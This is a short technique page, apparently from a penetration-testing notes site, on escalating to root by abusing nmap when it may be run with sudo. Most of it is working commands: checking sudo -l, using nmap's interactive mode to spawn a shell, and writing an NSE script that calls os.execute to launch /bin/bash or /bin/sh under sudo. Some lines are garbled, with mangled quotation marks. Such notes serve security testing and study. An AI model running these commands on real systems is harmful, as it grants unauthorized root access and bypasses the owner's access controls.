NMAP Exploitation
Last updated
Last updated
NMAP Exploitation.
Nmap is scanner for network and OS detection. If nmap being misconfiguration used "sudo" or "administrator" it can lead to privilege escalation.
Using sudo -l
-l using for listing all
Or
Run sudo nmap -- interactive or nmap --interactive
!bash or !sh
Whoami
It will escalate as root.
Same as above, but this time --interactive not working. We need to play we environment a bit.
TF=$(mktemp)
echo βos.execute(β/bin/bashβ)β > $TF
Sudo -u root nmap --script=$TF
Or
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
We now root. This technique used to run a script in nmap.